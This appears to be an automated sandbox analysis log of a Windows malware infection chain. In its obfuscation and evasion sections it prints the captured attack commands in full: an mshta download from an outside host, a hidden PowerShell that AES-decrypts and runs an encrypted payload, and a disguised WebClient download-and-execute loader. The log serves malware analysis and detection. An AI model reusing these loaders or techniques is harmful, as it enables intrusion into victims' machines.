Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1782817752.00000000079B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.1769565150.0000000003319000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb//: source: powershell.exe, 00000006.00000002.1782817752.00000000079B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb. source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\dll\System.pdb source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd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d=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B7C00AD pushad ; iretd 0_2_00007FFD9B7C00C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_050B8EAA push esp; ret 6_2_050B8EB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2125
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1317
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 700
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5673
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4057
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7716 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000004.00000002.1770657838.00000189790C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000004.00000002.1769365510.0000018978F1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: mshta.exe, 00000002.00000002.1806902173.000001C9A2F68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}GE
Source: mshta.exe, 00000002.00000003.1778778827.000001C19C8B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800305341.000001C19C8B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798070567.000001C19C8B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2912318880.000001EB77455000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2912197242.000001EB77443000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1770657838.00000189790C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000002.00000003.1778209554.000001C99EB24000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\3
Source: svchost.exe, 00000003.00000002.2909480503.000001EB71E2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
Source: powershell.exe, 00000006.00000002.1783092425.00000000079E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd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d=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function qtyvd($unyz){return -split ($unyz -replace '..', '0x$& ')};$zkihj = qtyvd('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');$midmd=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((qtyvd('794a5742476f737a6a656e545246734b')),[byte[]]::new(16)).transformfinalblock($zkihj,0,$zkihj.length)); & $midmd.substring(0,3) $midmd.substring(129)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command & {'2lt'|foreach-object {si variable:2lt ([powershell]::create()); [void](get-item variable:\2lt).value.addscript((([system.net.webclient]::new().((([system.net.webclient]::new()|get-member)|where-object{(get-variable _ -value).name -ilike '*wn*d*g'}).name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (get-item variable:\2lt).value.invoke(); (get-item variable:\2lt).value.dispose()}}
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function qtyvd($unyz){return -split ($unyz -replace '..', '0x$& ')};$zkihj = qtyvd('943c2c5c46a72b5c4c8c5c1a51e4fdd0974703bce4edf56b369378dfb2ecc854e259560ab569239046f77ea06a763337bd3340ff80b07c3cfce33778e61b44845b5324775ee6ecad2d2f37dd4f8dc9d93a8aba7267aa5ea340079fa2334c6403714460816209b0d0411244284f7b8814fd62c23e419a8d047cb9595a51fea7a3bca7328cc8fcaf14c3f8165e90e2486dfad60c27534f2c51c86d7f420cbba4abb44cacb3574a60609ed4b1f8bbc087d26ffe66eeb68f5686820c155b78783e6e11cf5815fcd1e2f8ca8c49791c0c4df291ea66a7712921d9c59db6e39d4f98ed2dc1a8e7a9946079ca7bf16ce0b32d041bed47781feb352bdf1fb6018763d773644268b71f2526f6a617a9272a9acdb0172ff20c3d1547782e3dbe0edec2c049aea1dce8744256c6e8717d86e602bf21d022b7e481612fd0e5ad43def8aeff4bb1bb463d861888792ac5cfdac45c5aad05bee91dabcc7a8ce6dc0862f3e928be382f093c9d84d38a85151eeabb858c33520b5aaba90dff68ee69a74d113c6c05bc871865da879842d0b54c1db7f4958097d12cecc5f9e39c9f6ef9adf065dda2643775ff589bdda148e4527b97de7ba451ac1ee997b73b0a1625177692622e4719148456ac24deea746d100f63e2e62646f66b245d3eed88607ab4d8a6022fa2f645bbfa59344e4471cb907fa8e491aa033889db9d942e3f5420ff522c4c2c6217479bac41430765cc37214d382a23920123068e397ca5ae645c1d0119db511f8b852ea48834469651d0ec476969f2449303e7019452064057ce45dc4e16896b015b29cb64430183af5618b121490dee43084dc3253bc82e49716867cb584156d7865e1fa9da392090109df6e9a6cefcab60be063896fe271d5f7145798747455ebe31b24e9bae3dde94e125c3aab0f1cc7da5d7d2c49f75d3d71be3450edfb23086a4d618521b1ee6ea4f7759e9cfc131005524c9b65d1d3d9fcb4f3e8a222d8020e0829864f6709cea97810c2185cb147f13c7495b150a44fe94ec3e805fbe21bab82b15870cae560aae4d4d533e433abf4e5a563b39f36b23b63195f3779b0f8e07ae51936d7659cf47354c6662908568295088267d164dbf8cd609767b8170defee21b10ce5c7244c519247c7c2f9ce8d7fa4027320e443b37f498f4bcde2e63a97ac0167dcbd9df73193fa93b3a82859fc1c7c6a740dd714
0682426d7269e3ddeb5ab9467ec828c2c24e5d9149a12d98dff32d05203d7536888907c29ca12dfcfb29b179e5f80df3c545318d33794fae90bec7c573d81530a72c3e1664c1fcd78ffe0cc509a78f2e435bee0a9ee5e4c0f5f6825b6883a784655b387ac0a63d3779d94d06e0c3bfc63d493d83b351266304e3c6a7fe938db9f5ffd576369c82ca0050c55c2e8e82286d9ac048ee0f6e20cf515b8d1a1268959b2d3e695204352487cf3533397b42917060a182262aa9f2ea0b93e6742c4a2c669e95cd728');$midmd=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((qtyvd('794a5742476f737a6a656e545246734b')),[byte[]]::new(16)).transformfinalblock($zkihj,0,$zkihj.length)); & $midmd.substring(0,3) $midmd.substring(129)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
